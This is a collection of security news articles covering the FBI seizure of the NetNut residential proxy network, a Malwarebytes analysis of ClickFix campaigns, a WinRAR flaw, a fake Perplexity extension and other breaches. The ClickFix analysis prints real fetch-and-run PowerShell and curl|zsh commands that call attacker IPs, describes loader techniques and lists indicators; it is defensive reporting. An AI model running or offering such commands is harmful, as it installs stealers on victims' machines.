The NetNut homepage today was replaced by this seizure banner from the FBI.

On June 19, three different security firms issued similar findings: That NetNut is a residential proxy network which populates a botnet called Popa, and distributes software for devices commonly found in homes, such as smart TVs and streaming boxes. NetNut’s software turns those systems into always-on residential proxy nodes that are rented to others, who predominantly use them to relay abusive and intrusive Internet traffic, such as mass content scraping, advertising fraud, and account takeover activity.

Earlier today, NetNut’s homepage was replaced with a seizure notice from the FBI and the Internal Revenue Service Criminal Investigation division. The seizure notice thanked Google, Lumen, Shadowserver and other industry partners for their help in dismantling hundreds of domains tied to the Popa botnet, which experts say has long been synonymous with NetNut’s residential proxy infrastructure.

In a blog post published today, the Google Threat Intelligence Group (GTIG) said NetNut’s proxy network is widely resold and white-labeled by a number of third-party proxy providers, and that its services are heavily sought out by cybercriminals seeking to obfuscate the source of their malicious traffic. The GTIG said that in a single week during June 2026, they observed 316 distinct clusters of threat actors using suspected NetNut exit nodes, including cybercriminal and espionage groups.

“These bad actors can use NetNut to mask their origin IP address when accessing victim environments, accessing their own infrastructure, and conducting password spray attacks,” Google’s GTIG wrote. “Furthermore, when a consumer device becomes an exit node, unauthorized network traffic passes through it. This means bad actors can access other private devices on the same home network, effectively exposing them to Internet threats.”

Google said it disabled Google accounts and services used by NetNut for malware command and control, and that it shared technical intelligence on NetNut’s software development kits (SDKs) and backend infrastructure with platform providers, law enforcement and research firms. The company also disabled apps known to bundle NetNut’s various SDKs.

Omer Weiss, legal counsel for NetNut parent Alarum Technologies, said the company was aware of the FBI seizure and cooperating with investigators.

“Alarum takes this matter seriously and will fully cooperate with law enforcement to ensure any misuse of its infrastructure is thoroughly investigated and those responsible are held to account,” Weiss said in a written statement.

Benjamin Brundage is founder of the proxy tracking service Synthient, one of the companies that published evidence last month linking the Popa botnet to NetNut and Alarum Technologies. Brundage said the domain seizures appear to have disrupted both the Popa botnet and the NetNut proxy network that rides on top of it.

Brundage said NetNut’s apparent demise is likely to be a great disadvantage for the cybercrime community, which was already reeling from legal actions by Google earlier this year that seized infrastructure for NetNut’s biggest competitor — IPIDEA.

“I think this takedown is going to have a big impact, because NetNut gained significant popularity after the IPIDEA takedown,” he said. “Also NetNut has been incredibly common among resellers, and they were on par with IPIDEA in terms of their daily traffic, quality, size, price per gigabyte, all of it.”

NetNut’s infrastructure, in a nutshell. Image: Black Lotus Labs, Lumen.

The NetNut and Popa botnet takedown may have another added benefit, Brundage said: Lessening the impact of large distributed denial-of-service botnets that have been built on the backs of poorly configured residential proxy services. In January, Synthient revealed how cybercriminals had built the world’s largest DDoS botnet (Kimwolf) by tunneling through IPIDEA proxy connections into the local networks of TV box owners, and infecting other Android-based devices behind the victim’s firewall.

While many of the bigger proxy providers took steps to block this activity, resellers of the major proxy networks have been far slower to respond to the threat, Brundage said.

“In terms of all these TV box devices getting compromised from the proxy network, it will have an impact on the DDoS botnets out there,” he said.

For its part, Google reckons today’s actions have caused “significant degradation to NetNut’s proxy network and its business operations, reducing the available pool of devices for the proxy operator by millions.” But the company warns that proxy networks can rebuild themselves by effectively reselling other proxy services, as IPIDEA has done over the past few months.

“Google has high confidence that many popular residential proxy brands are in fact whitelabeling the NetNut botnet,” the GTIG report concludes. “While we expect this disruption to have a larger ripple effect across the residential proxy ecosystem, observations after the disruption of IPIDEA proved that individual networks can appear resilient. What we have observed is that when faced with the degradation of their own botnet, proxy operators begin buying capacity from their competitors, effectively becoming a reseller. We recognize that creating a lasting disruption in this fluid ecosystem means we must scale our efforts to target the infrastructure of several interconnected providers.”

As KrebsOnSecurity has warned repeatedly, most of the no-name TV streaming boxes for sale on the major e-commerce websites either come pre-installed with residential proxy software, or require the installation of proxy SDKs in order to use the device for its stated purpose (streaming pirated movies, sporting events and TV shows). Google’s advice here is sound: When it comes to TV boxes, stick to name brands from reputable manufacturers, and then be sparing and judicious with any apps you choose to install.

The sketchy TV boxes that are being commandeered by the Popa botnet and other threats all come with or require the user to install unofficial Android operating systems that do not operate within the confines of Google’s Official Play Protect store. Google says consumers can confirm whether or not a device is built with the official Android TV OS and Play Protect certification by following these instructions.

Even people without TV streaming boxes can find their smart TVs enrolled in residential proxy networks, just by installing one of thousands of apps available for download on Samsung and LG smart TVs. In a report released last month, the proxy tracking company Spur found 42 percent of apps available for download via the webOS operating system on LG smart TVs include SDKs that turn one’s television into an always-on residential proxy node. More than a quarter of the apps made for Samsung’s Tizen operating system had similar residential proxy components, Spur found.

Image: Spur.us.

Update, 4:24 p.m. ET: Included a statement shared post-publication from an attorney representing NetNut parent Alarum Technologies.

AI-driven cyber warfare reshapes global defense readiness

msspalert Jul 2, 2026 · 20:12

If adversaries are using AI to move faster, hide better, and hit harder, businesses need to be equipped with governed AI capabilities, hardened basics, and rehearsed crisis plans of their own.

Apple’s Hide My Email doesn’t hide it very well

Malwarebytes Jul 2, 2026 · 18:22

404 Media reports that a researcher has found a vulnerability in Apple’s Hide My Email feature that could allow someone to discover a person’s real email address.

That’s especially concerning because protecting your real email address is exactly what the feature is designed to do. 404 Media did not publish technical details of the vulnerability to avoid helping attackers exploit it, but said it independently verified that the issue works.

Hide My Email generates:

“Unique, random email addresses that automatically forward to your personal email inbox. Each address is unique to you. You can read and respond directly to emails sent to these addresses and your personal email address is kept private.”

Instead of giving a website or app your real email address when you sign up, you can give it one of these randomly generated addresses. Messages are forwarded to your normal inbox, but the sender shouldn’t be able to see your real email address. At least, that’s how it’s supposed to work.

Tyler Murphy, co-founder of EasyOptOuts, discovered and reported the issue to Apple in June 2025. More than a year later, he says the vulnerability still hasn’t been fixed.

When Murphy reached out to Apple again in May, he received the following response:

“We are still investigating this issue. To avoid placing our customers at risk, we would appreciate you not disclosing this information until our investigation is complete. We appreciate your assistance in helping us to maintain and improve the security of our products.”

Murphy suggested Apple should stop promoting the feature until it could be fixed. Apple reportedly told him it expected to address the issue in a security update in the coming weeks. When that failed to happen, Murphy decided to reach out to 404 Media.

Instead, we learned a few weeks ago that Apple plans to make the Hide My Email less useful for some users. In a note to developers, the company said it will move anonymously generated email addresses to the @private.icloud.com domain. Effectively, this makes it easier for apps and websites to recognize that an email address was created with Hide My Email and potentially refuse to accept it during the sign-up process.

What you can do

Using a different email address for every website or service is still good privacy practice. It makes it easier to identify which company exposed your address in a data breach, and you can simply stop using a compromised alias without changing your main email address.

However, until Apple fixes the issue, you shouldn’t rely on the Hide My Email feature as the only way to keep your real email address private.

Meanwhile, keep an eye open for Apple’s promised security update.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Fake Google and Cloudflare verification pages spread multiple malware families

Malwarebytes Jul 2, 2026 · 18:05

Updated July 6 to add connections with SyncTDS and TrafficTDS 

ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices.

A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.

We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer.

In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.

Before we look at the technical details, here’s how to avoid becoming the next victim.

How to stay safe

ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:

  • Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does.
  • Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem.
  • Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.
  • Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them.
  • Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels.

Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.

Technical analysis

The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.

Different lures, one goal

Most of the campaigns share several characteristics:

  • Use of the folder C:\ProgramData\Zooms to extract later stages
  • PowerShell ClickFix commands that follow similar patterns
  • Use of Cloudflare R2 buckets to deliver payloads
  • IP addresses hosted by the ASN Dedik Services Limited
  • HTML responses containing only the phrase "hehe"

These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets.

The final command copied by the user usually falls into this pattern: 

powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”

The port and the path are not always present in the cases analyzed; the ports are random, but some used ones are: 6600, 9900, 5506, 7895, 7493, 149, 8442. 

To execute these commands, several ClickFix-related templates are used, mainly related to Google and Cloudflare. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework. 

We observed these ClickFix campaigns being distributed through:

  • Old websites that have likely expired and been repurchased by the actor(s).  
  • CloudFlare Pages (.pages.dev domains). 
  • Compromised websites. 
  • Fake services, for example related to QR code or web file access. 

Google ClickFix lures 

The actors behind these campaigns use various Google-related HTML pages and kits. 

One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.

Some of these pages have URL parameters like such as “zoneid”, “cost”, “device”, “country”, “clickid”, for example: 

  • /conf/captcha.html?zoneid=10420852 
  • /wincapbot/nobot.html 
  • /xmr/trkuste.php?zone=5327134 
  • bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop 
"Manual Verification Required” ClickFix page "Manual Verification Required” ClickFix page“Manual Verification Required” ClickFix page

In this case, the functions related to ClickFix are implemented in the class CustomCaptcha.  The command is present in clear without any obfuscation. 

StartVerification” method in the “CustomCaptcha” classStartVerification” method in the “CustomCaptcha” class

Another distribution method uses Cloudflare Pages hosted on .pages.dev subdomains.

"Verify you’re human” ClickFix page“Verify you’re human” ClickFix page

In this case, the HTML page is obfuscated by declaring several variables and XORing them.  The deobfuscated code is called SECURITY GATEWAY and it’s composed of the functions GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, and PanelController.  

The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.

The PowerShell command declared in the “SECURITY GATEWAY” code The PowerShell command declared in the “SECURITY GATEWAY” code

We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary. 

“New sign-in with trusted token” ClickFix page“New sign-in with trusted token” ClickFix page

The interesting part of this ClickFix kit is that it features an “approval gate,” as described in the comments, and that the attacker must manually choose from the panel which command to have the user execute. 

Comments about the kit and the “approval gate” Comments about the kit and the “approval gate” Comments about the kit and the “approval gate”

In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues. 

The “fix audio driver” Meet ClickFix lureThe “fix audio driver” Google Meet ClickFix lure

In the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} 

Other lures 

The actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures that copied commands related to the same infrastructure. 

The attackers behind these campaigns also compromise multiple websites using different templates related to the CloudFlare ClickFix lure. 

“Verify you are human” ClickFix pages “Verify you are human” ClickFix pages“Verify you are human” ClickFix pages

We have detected several templates used for CloudFlare pages. The command is present in clear or in some cases obfuscated in the cases analyzed. 

Some of the CloudFlare ClickFix HTML pages  Some of the CloudFlare ClickFix HTML pages  Some of the CloudFlare ClickFix HTML pages Some of the CloudFlare ClickFix HTML pages 

We also detected some specifically created fake services websites.  For example, a “My QR Generator” site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that the user is not a robot. 

“QR Code” ClickFix lure page “QR Code” ClickFix lure page 

In this case the command is encoded in base-64: 

Decoded PowerShell commandDecoded PowerShell command

PowerShell downloader 

The ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name tmp{4 char}.tmp.ps1

We have detected several variations of this script, but recent versions do the following: 

  • Create the folder C:\ProgramData\Zooms
  • Download the next stage from a CloudFlare bucket and save it in C:\ProgramData\Zooms. In some variants of the script, the next stage is downloaded directly from an IP. 
  • Send the information of the compromised machine to http://{IP}/dl-callback. In some variants of the script, this part is not present. 
Dropped PowerShell script Dropped PowerShell script

The attackers behind these campaigns use a large number of different payloads.The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. For many of the cases analyzed, the final payload was distributed via DLL Hijacking, as we will also see later for StealC stealer. 

File Distributed Malware distributed libEGL.zip, Safe-1.zip Trojanized Electron App, ResiLoader and StealC Test.msi Deno Loader and PowerShell Stealer arworks.zip Amatera Stealer water-night.zip Remus Stealer Setup.msi, Invintrum_first.msi NetSupport traffic1.msi CastleLoader ibrowser.exe Rust Stealer 

We analyzed a new loader called ResiLoader that ultimately distributes StealC. We also detected that the threat actor in the latest campaigns has started using Deno to distribute a stealer developed in PowerShell at the end; the analysis of this infection chain could be the subject of a future blog post. 

Trojanized Electron app downloads ResiLoader

In this case, the ZIP was downloaded from: 

  • pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip 

After extraction to: 

  • C:\ProgramData\Zooms\libEGL.zip_ext

The zip contains a trojanized version of the open-source messaging app called “Franz”: 

The trojanized "Franz" app used to download ResiLoaderThe trojanized “Franz” app used to download ResiLoader

The malicious code is implemented in the index.js file: 

The obfuscated code in the backdoored appThe obfuscated code in the backdoored app

The downloader performs the following operations: 

  • Decode the strings with the function HC()
  • Reads readme.txt, expects a campaign key of the form AAAA-BBBB, returns it as an array of tokens. In this case the name is resiloader-1 and for this we call “ResiLoader” the downloaded DLL. 
  • Reads %APPDATA%\setup.txt; if absent, generates a random 8-char string and persists it.  
  • Obtaining persistence using app.setLoginItemSettings
  • Sends a POST request to https[:]//completstep[.]com/api/ and elaborate the JSON response
    • If task.e is present, it executes eval(task.e); it allows the attacker to execute arbitrary JavaScript code. 
    • If task.files is present, create %TEMP%\<Date.now()>\, decode and write each file; if any filename ends in .exe, run it via child_process.exec

In our case we received a ZIP that performs the DLL hijacking of ssh-add.exe

{"task":{"name":"JUNE18USY","files":{ 

   "msys-2.0.dll":"<base64>", 

   "msys-crypto-3.dll":"<base64>", 

   "msys-gcc_s-seh-1.dll":"<base64>", 

   "ssh-add.exe":"<base64>" }}}

After, the executable was executed with: 

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" 

ResiLoader

The msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion using a BYOD technique, obtain persistence and ultimately loads the stealer StealC.  We didn’t find a specific attribution for this loader and so we called it “ResiLoader” based on the string present in previous readme.txt

The loader contains several strings, some clear and some encrypted.  After decrypting the strings, it’s possible to have a full picture of the functionality of the ResiLoader. 

MANPO: ReadModule len=... 

MANPO: magicOffset=...
… 

PERS: FAIL all file copies failed, skipping run key 

PERS: FAIL both HKLM and HKCU Run key writes failed 
… 

RUNPE: CreateProcess failed 

RUNPE: PEB patched 

RUNPE: VirtualAllocEx failed 
… 

POST: RunForever exited (unexpected) 

POST: entering RunForever 

POST: hollow=

The loader performs the following operations: 

  • Extract the encoded blob containing two payloads reading the marker AtLorenBase and the length of the encoded blob. After, it decodes the blob and decrypts the driver pcdhost.sys (OPSWAT  
    AppRemover Driver) and StealC payload using a custom decryption algorithm.  
  • Terminate more than 140 processes related to EDR/AV processes using the dropped driver. 
  • Perform UAC bypass via ICMLuaUtil Elevated COM Interface. 
  • Create a folder C:\ProgramData\Google Update, copying itself; adding persistence using the RUN Registry Key 
  • cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe 

In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer. 

Connections with SyncTDS and TrafficTDS 

We found several other ClickFix campaigns and kits potentially linked to the same operator(s), although there is not enough evidence to confirm this. 

The domain dasdasdikasjdas[.]click resolves to one of the IPs related to this campaign 151[.]240[.]151[.]126. The domain previously returned a panel called “SyncTDS”. We found more than 20 domains that return the SyncTDS related panel. This panel has also changed graphics over time. 

One of these “SyncTDS” domains, maskingofking[.]xyz, resolves to 193.111.117[.]6 which hosts several ClickFix-related domains and an open directory containing an interesting kit called “TrafficTDS.” This kit allows the operator to support different payloads related to Windows, Linux, MacOS and Android. In this case, the pages shown to the user are related to ClickFix with a CloudFlare lure. 

The structures of the “Traffic TDS” panel The structures of the “Traffic TDS” panel  The “TrafficTDS” kit with the payloads for the different OS The “TrafficTDS” kit with the payloads for the different OS 

One of the most interesting parts of this kit is the “APK manager” section, which allows the operator to show the user an “Update Required” page to download the malicious APK. 

The APK manager sectionThe APK manager section The fake update page for Android devicesThe fake update page for Android devices

IOCs 

Hash 

72907d0ca3258365838626f6a8d993a6: ResiLoader DLL 

0234E3188F2883A438B3F2BEAB7A78B2: StealC 

6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus 

206ce339febca0c3bcc850f42595fc63: Amatera Stealer 

eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT 

b8d53740024d126cb55f83854335a4ab: Rust Stealer 

Domains 

Distribute ClickFix pages: 

onegeekworld[.]com 

thefirmos[.]com 

antibotv3[.]com 

centralwildcats[.]com 

cloud.antibotv3[.]com 

cloudautosolutions[.]com 

sunseekersupply[.]com 

123clocks[.]com 

orcanegames[.]com 

rwmonitoring[.]com 

100furniture[.]com 

nepalcharchaa[.]com 

p-floribunds.pages[.]dev 

pg-altirade2.pages[.]dev 

pg-cordivant-m6.pages[.]dev 

g-luminence.pages[.]dev 

generator-qrcode[.]online 

regdev-google[.]com 

khosla[.]capital 

eorgke09054909j[.]com 

dropboxi[.]com 

CloudFlare buckets used for payload distribution

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-620528e2dc874e16937673265aa23d39.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-9682d5896df841679c5a17eb41273f89.r2[.]dev 

pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev 

pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

unitedstateverif[.]com: payload distribution 

bigflaredefence[.]com: payload distribution 

popularcard[.]shop: Rust Stealer C2 

xzz[.]proxygrid[.]cc: Amatera Stealer C2 

completstep[.]com: Loader C2 

eventlogerps1[.]ink: Deno Loader  

be231ro963[.]com: Deno Loader  

IPs 

IP used for payload distribution

151.240.151[.]126 

85.239.149[.]16 

85.239.149[.]40 

93.152.224[.]29 

151.240.151[.]46 

93.152.224[.]167 

85.239.149[.]78 

192.69.195[.]131 

135.181.171[.]40 

94.26.83[.]206 

91.92.34[.]128 

85.239.144[.]31 

93.152.224[.]39 

94.26.90[.]112 

146.19.248[.]120: StealC C2 

Acknowledgements  

WinRAR flaw could allow attackers to take control of your computer

Malwarebytes Jul 2, 2026 · 14:38

Rarlab has released a new version of the popular WinRAR tool to patch a vulnerability that can be abused in remote code execution attacks.

The issue is fixed in WinRAR 7.23, but users must install the new version manually because WinRAR still does not offer automatic updates. They also need to make sure they download the version that matches their system and language preference.

There are five operating system to choose from (Windows, macOS, Android, Linux, and FreeBSD), which shouldn’t be too hard. More people will struggle with choosing 64 bits, 32 bits, or ARM, which requires checking their system specifications.

The vulnerability, tracked as CVE-2026-14191, affects the way WinRAR and UnRAR handle RAR5 recovery-volume (.rev) files, which are optional files used to help repair damaged or incomplete archives.

This means an attacker can craft a set of two or more .rev files that make WinRAR write data outside the memory it has allocated. In simple terms, the malicious recovery volumes can trick WinRAR into writing data just past the end of a memory buffer, corrupting its own data, which attackers may be able to exploit to run malicious code on the victim’s computer.

According to the European Vulnerability Database entry EUVD‑2026‑40869, the bug is a variant of the 2023 flaw tracked as CVE-2023-40477, which was also found in the recovery volume handling code.

No automatic updates

The problem with the lack of automatic updates is that users first have to become aware that a new version is available. Although there are third-party tools that can monitor this for system administrators, most home users risk missing it.

A 2025 vulnerability in WinRAR was exploited by Russia-aligned groups against Ukrainian organizations long after the vulnerability had been patched.

How to stay safe

Besides installing the updated version of WinRAR and/or UnRAR, there are a few general ways to stay safe.

  • Don’t open unsolicited attachments unless you can verify their origin through an independent channel.
  • Use an up-to-date, real-time anti-malware solution to keep malware off your devices.
  • For system administrators: Treat WinRAR as optional software. If users do not need it for business reasons, remove it through your software inventory or asset management system to shrink the attack surface, or use a suitable tool to notify you promptly about updates.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Fake Perplexity Chrome extension spies on your searches

Malwarebytes Jul 1, 2026 · 22:11

Type “Perplexity” into the Chrome Web Store and you get a range of browser extensions offering access to the popular AI search service. Until last week, one of them was called “Search for perplexity ai,” and it delivered something extra that users hadn’t bargained for: a small hidden surveillance operation.

On June 29, Microsoft’s Defender Security Research Team revealed that the extension had been impersonating the real AI search company while secretly recording what users typed. Google took it down, but users who already installed it are still at risk.

How the extension harvested user queries

The extension routed user traffic through the typosquatted domain perplexity-ai[.]online rather than the legitimate perplexity.ai. It requested chrome_settings_overrides, the standard permission that lets an extension become the browser’s default search engine.

But it also asked for a rules-based network permission called declarativeNetRequest (DNR), which allowed it to send users’ searches through a server controlled by the attacker. Microsoft said this extra permission wasn’t necessary for the extension’s advertised purpose, making it a warning sign. Neither raised a flag during Web Store review, though.

Using these permissions, searches entered into Chrome’s address bar were first funneled through an attacker-controlled server, allowing it to see users’ searches and log each request along with the IP address, browser headers, and user-agent string.

Then it forwarded the search on to a real search engine so results came back looking normal.

The extension didn’t just include Perplexity in its code. It was also able to redirect traffic to Google and Bing if the developer chose to enable it.

The extension also had access to Chrome’s search suggestion feed, which powers predictive autocomplete. That meant the interception happened in real time. Anything typed, even if it was deleted before pressing Enter, still went to the operator’s server.

Based on all of this, Microsoft concluded the surveillance was the point, not a side effect of the redirect architecture. No operator has been publicly identified.

Taking it out of the store doesn’t uninstall it

Google removed the extension after Microsoft’s disclosure, but that doesn’t remove it from the browsers of people who already installed it. If you added “Search for perplexity ai” at any point, it is still sitting in your extensions list until you uninstall it manually, which we advise you to do right away.

How to uninstall it

Open chrome://extensions/, turn on Developer mode, and check the 32-character ID of every extension you have installed. Extension names in Chrome are not unique, and criminals rely on that. Compare each ID against the one listed on the developer’s official website before you trust it.

Uninstall anything you don’t use. A smaller extension list is a smaller attack surface. Only grant the permissions an extension needs to do its job. And be extra careful about checking the publisher behind an extension, along with the domains it uses.

This is not a Perplexity-only problem

A Stanford and CISPA study found that malicious extensions remain in the Chrome Web Store for about 380 days on average before removal. AI branding just makes the bait shinier and more appealing.

In January, researchers found malicious Chrome extensions spying on ChatGPT sessions, while a separate campaign last year vacuumed up AI chats without victims’ knowledge and sent them on to a data broker.

Another campaign, involving an extension called AITOPIA, impersonated AI-related tools and reached more than 900,000 users. That campaign targeted ChatGPT and DeepSeek chat histories rather than search queries.

KDDI Data Breach May Expose 14.2 Million Email Accounts 

eSecurity Planet Jun 29, 2026 · 21:01

Japanese telecommunications operator KDDI Corporation has disclosed a data breach that may have exposed email addresses and passwords for up to 14.2 million customer accounts across six internet service providers (ISPs). 

The company discovered unauthorized access to a shared email system on June 17, blocked the attacker, and implemented additional defensive measures. 

Key Takeaways of the KDDI Incident

  • KDDI disclosed a breach that may have exposed the email addresses and passwords of up to 14.2 million accounts across six Japanese internet service providers.
  • Attackers exploited a vulnerability in third-party software, highlighting the downstream risks of shared infrastructure and supplier dependencies.
  • The exact impact remains under investigation, and KDDI has not disclosed how passwords were stored for all affected accounts, leaving the overall credential risk uncertain.
  • Exposed email credentials can enable spearphishing, credential stuffing, and account takeover attacks, even if some passwords were hashed or encrypted. 

Breach Affects Multiple Japanese ISPs

This incident impacted email services operated by KDDI as well as STNet, JCOM, Chubu Telecommunications, NIFTY, and BIGLOBE. 

KDDI is one of Japan’s largest telecommunications companies, with approximately 45,000 employees. 

The company estimated that up to 14.2 million accounts may have been exposed, including current customers, former customers, and inactive accounts that may no longer be in use.

KDDI said the investigation remains ongoing, and the exact number of affected accounts has not yet been confirmed. 

Because the impacted system supported multiple ISP operators, the breach shows how a shared service or supplier-dependent infrastructure can increase downstream risk when a single system is compromised.

Password Exposure Risk Remains Unclear

KDDI said some passwords were stored in hashed or encrypted form, which may reduce the likelihood of immediate account takeover. 

However, the company did not disclose the hashing or encryption methods used, whether salts were applied, or what percentage of accounts received stronger protection. 

Because password exposure risk depends heavily on how credentials are stored, weak hashing, reversible encryption, or plaintext storage could leave some users more vulnerable than others. 

Even if some passwords cannot be immediately abused, exposed email addresses and login data can still create risks for spearphishing, credential stuffing, and account takeover attempts. 

KDDI Notifies Regulators and Affected Providers

KDDI said it began contacting affected ISPs and reported the incident to Japan’s Personal Information Protection Commission and the Ministry of Internal Affairs and Communications. 

The company is also working with affected providers to implement additional security measures and reduce the risk to customers.

Impacted customers should reset their email passwords, enable two-factor authentication (2FA) where available, and use password managers

Organizations should monitor for unusual login activity, failed authentication spikes, suspicious forwarding rules, and phishing attempts targeting affected users. 

The KDDI breach highlights how third-party software vulnerabilities can create large-scale exposure when they affect centralized infrastructure. 

Zero trust solutions can help organizations limit the impact of compromised credentials and third-party risk through continuous verification and least-privilege access. 

The post KDDI Data Breach May Expose 14.2 Million Email Accounts  appeared first on eSecurity Planet.

DOJ Seizes 400 Illegal FIFA World Cup Streaming Domains

eSecurity Planet Jun 29, 2026 · 15:09

The U.S. Department of Justice (DOJ) has seized nearly 400 internet domains that were illegally streaming FIFA World Cup 2026 matches.

The operation, known as Operation Offsides, targeted websites distributing unauthorized live broadcasts while also highlighting the cybersecurity risks often associated with illegal streaming platforms.

According to the DOJ, the seized websites provided unauthorized real-time streams of World Cup matches in violation of U.S. copyright law. 

“We have seized hundreds of domains, used to illegally stream World Cup matches for profit, to disrupt the international networks that profit from the global popularity of the World Cup,” said Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division, in the press release. 

Key Takeaways

  • The U.S. Department of Justice seized nearly 400 domains used to illegally stream FIFA World Cup 2026 matches as part of Operation Offsides.
  • The international operation targeted illegal streaming infrastructure across Peru, Bulgaria, Croatia, Romania, Poland, and Colombia with support from FIFA and industry partners.
  • Officials warned that illegal streaming sites can expose users to malware, phishing attacks, malicious redirects, and data theft in addition to copyright violations.
  • The DOJ says the takedown is part of a broader effort to disrupt criminal piracy networks while protecting consumers from associated cyber risks. 

International Operation Targets Global Streaming Infrastructure

The enforcement action extended well beyond the United States. 

Through the International Computer Hacking and Intellectual Property (ICHIP) Network, authorities targeted illegal streaming infrastructure in Peru, Bulgaria, Croatia, Romania, Poland, and Colombia. 

Investigators confirmed the domains were illegally streaming World Cup matches, with FIFA and several media partners helping identify the infrastructure. 

Illegal Streaming Can Introduce Cybersecurity Risks

While the operation focused on copyright enforcement, officials also emphasized the cybersecurity dangers associated with unauthorized streaming sites.

According to Eric Weindorf, Special Agent in Charge of Homeland Security Investigations (HSI) Washington Field Office, illegal streaming platforms frequently expose users to additional cyber threats beyond copyright violations.

“These streamers not only violate copyright laws but also expose viewers to potential threats—including malware attacks and unsecure connections that can compromise personal and financial data,” Weindorf said.

Many unauthorized streaming websites rely on aggressive advertising networks, malicious redirects, fake browser updates, and phishing campaigns to generate revenue. 

Some also attempt to install malware or collect sensitive information from unsuspecting visitors. 

Protecting Intellectual Property Through Global Cooperation

Operation Offsides reflects the growing role of international cooperation in combating digital piracy. 

U.S. prosecutors worked alongside foreign law enforcement agencies through the ICHIP program, which provides cybercrime and intellectual property expertise to partner nations.

The initiative is part of a broader DOJ effort to disrupt online criminal ecosystems that profit from copyrighted content while protecting consumers from associated cyber risks. 

According to the Criminal Division’s Computer Crime and Intellectual Property Section (CCIPS), the department has secured convictions against more than 180 cybercrime and intellectual property offenders since 2020 and recovered more than $350 million in victim funds.

As the FIFA World Cup continues across host cities in the United States, Canada, and Mexico, officials say enforcement efforts against illegal streaming operations will remain ongoing. 

The takedown serves as a reminder that unauthorized streaming platforms may expose users to far more than copyright infringement, creating opportunities for malware infections, phishing attacks, and the theft of personal and financial information.

Organizations can reduce the risk of malware, phishing, unauthorized access, and other attacks by implementing zero trust solutions

The post DOJ Seizes 400 Illegal FIFA World Cup Streaming Domains appeared first on eSecurity Planet.

Weak Access Controls Leave Enterprise Networks at Risk 

eSecurity Planet Jun 27, 2026 · 00:25

Many successful cyberattacks still exploit exposed services, weak credentials, and inadequate access controls. 

Recent findings from Barracuda Managed XDR highlight how attackers continue to exploit these gaps to deploy malware, compromise remote access infrastructure, and establish persistent footholds within enterprise environments.

Key Takeaways

  • Weak credentials, exposed remote services, and insufficient access controls continue to provide attackers with an easy path into enterprise networks.
  • Barracuda researchers observed LemonDuck malware, GoldBrute botnet activity, and a 55% increase in password spraying attacks targeting FortiGate VPNs.
  • Exposed RDP services and internet-facing VPNs remain high-value targets for credential attacks and ransomware operators.
  • Phishing-resistant MFA, timely patching, endpoint visibility, and continuous monitoring can reduce the risk of compromise. 

LemonDuck Demonstrates the Risk of Unpatched Systems

Barracuda researchers recently observed multiple LemonDuck malware infections affecting enterprise endpoints. 

LemonDuck is malware that hijacks systems for cryptocurrency mining while establishing long-term persistence for additional attacks. 

